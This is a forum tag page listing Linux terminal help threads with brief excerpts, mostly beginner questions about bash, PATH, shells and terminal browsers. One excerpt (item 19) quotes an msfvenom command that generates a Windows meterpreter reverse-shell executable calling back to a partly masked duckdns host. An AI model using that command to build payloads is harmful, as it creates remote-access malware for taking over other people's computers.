terminal

  1. gator4ever_

    Solved Terminal starts with bash alias not found

    Hello. I lam fairly new to linux, and I have run into an issue where these 3 lines appear when i open my terminal. bash: alias: godot: not found bash: alias: =: not found bash: alias: run /home/alison/Desktop/Godot_v4.5.1-stable_linux.x86_64: not found At some point a few months ago I...
  2. Prajinvenkat

    The another os

    When i play a gta vice city and any game in windows os it run smoothly . in linux ? i want to create a os like when we install my OS it ask for use you choose windows + linux gaming +hacking if anyone support my OS my github id is "prajine"
  3. D

    a terminal-command that allows us to list all users?

    good day dear linux-friends, hello everyone :) is there a certain terminal-command that allows us to list all users? well i think that this would be very useful to have a handy list of the users: the optons they would be great: we could do many things. for example to add, delete, modify...
  4. CataclysmicGentleman

    Best TERMINAL Browser?

    So I know there is Links, w3m and Lynx. From what i can tell, people on reddit recommended w3m 3 years ago, but when looking at the github and logs it was last updated 3 years ago, so it doesn't look well maintained from my limited understanding of things. does this pose a security risk? What...
  5. CataclysmicGentleman

    Best recommended terminal based web browsers?

    With the chance that firefox is going down in the not so distant future due to polices about ad revenue with google changing, and everything else is either no longer being maintained, or is switching to google based stuff (I dont know the technical terms sorry), I want to stay free from the...
  6. L

    Question ZSH in debian

    Hey guys, let's go. I started messing around with Linux recently, about a week ago. Let me give you an introduction. During this week, I've made a lot of mistakes. I even started a GNU course. I've formatted this notebook I'm using for learning about 14 times. It has an SSD and two 1TB external...
  7. A

    Total file system inode count; Web Server / VPS / Security

    Hi, my first post here and hopefully asking a simple question will get me a simple or reasonably simple answer. Using the Linux terminal how do I determine how many inodes the file system was setup with initially? My server came under inode attack two days ago. I've never heard the phrase...
  8. CataclysmicGentleman

    Solved help asap, cant boot. Debian (LMDE5) LightDM error due to GPU code I need to remove

    dad is starting work in a week and the Desktop is the only thing that can print in the house. need help asap. I was trying to follow turbot's guide for installing drivers for the GPU (RX 6400) and so far he has given OK ish advice, but sometimes given not the best advice. I need help asap, I...
  9. D

    No such file or directroy

    I am using Windows where I have downloaded MobaXterm and in the terminal I am writing a script trying to access an EC2 instance Now, I have downloaded the .pem file (key value pair) and kept it in a folder in (D) drive When I am writing this Permission denied part I have got it but why the...
  10. J

    Moving a file from another system on the same drive?

    Hello, can there be a designation with getting from <~> any of the rest directories when moving a file to </home> from another primary system? For example some official website indicates how to save a file to a Linux primary system e.g. <~/.local/> and so on, but when the file is moved from...
  11. J

    On WSL by terminal

    Hi, recently in a sub-systemLinux terminal for setting up drivers, cat/proc/version did not match its report of gcc version with the report of gcc -v; in fact, gcc -v did not detect anything to start with and offered to download one, which was different as in values of 11.xx.x and 9.xx.x . Now...
  12. A

    What’s the difference between bash and default terminal?

    I am very very new to Linux, and when I’m installing anaconda, I noticed that the conda command can only be used after I type “bash” and start using the bash console. What’s the difference between bash and the default terminal?
  13. A

    Fresh Arch Install: Can no longer clone from AUR

    Yesterday, I installed Arch, and I managed to successfully install a few packages (Zoom, among them) from the AUR. Note I shutdown and restarted my computer successfully a few times yesterday, and I managed to install all the packages from the AUR after my initial session on Arch But today, I...
  14. SpongeB0B

    [Solved] how launch a interactive terminal for an user from .profile

    Hi everyone, I was looking how to Launch command once at login per user. This is now working thanks to @NorthWest But I would like to launch for the user a terminal to change his password like this -> xfce4-terminal -e 'passwd' from a script that is being called from ~/.profile see: Launch...
  15. L

    Terminal shows a warning while installing: Not on PATH - how to fix? (SOLVED)

    I am trying to install "youtube-dl" and this warning is shown in my command line: WARNING: The script youtube-dl is installed in '/home/linuxmint/.local/bin' which is not on PATH. Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location...
  16. smooth_buddha

    What terminal emulator do you use?

    Im currently using a teminal emulator called "Terminology" its quite fun and customziable. I discovered it by using Bodhi linux, that distro has terminology as default terminal
  17. Adithyansm

    How to get an autocompletion in terminal Zorin bash shell [SOLVED]

    I have been using and learning kali for a couple of months and am used to its terminal. Like it will show a preview of previously typed command and we can use arrow keys to type the whole command and now I am using Zorin (Xfce) bash shell and missing that feature very much. Is there any way...
  18. L

    $PATH is not set properly

    Hi, I am using Ubuntu 64-bit on a VM and installed an app, added it to $PATH using export PATH=$PWD/bin:$PATH in my terminal (T1). Worked fine. Then i wanted to use the command in another terminal (T2) and got an error message that the command is unknown (exactly that, no more information). I...
  19. D

    Permission Denied

    I need help. when i write this code i can't access desktop. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=****.duckdns.org LPORT=**** -f exe > /root/Desktop/maceradg.exe sh: 1: cannot create /root/Desktop/maceradg.exe: Permission denied
  20. D

    recon-ng returning "invalid nameserver" error

    I was taking a course on ethical hacking where I came across a problem on running a tool on linux kali. In the video I saw the user use recon-ng to get info on a particular site but when I followed the exact steps I get the following error: [!] invalid nameserver. I'm typing below all the...
Top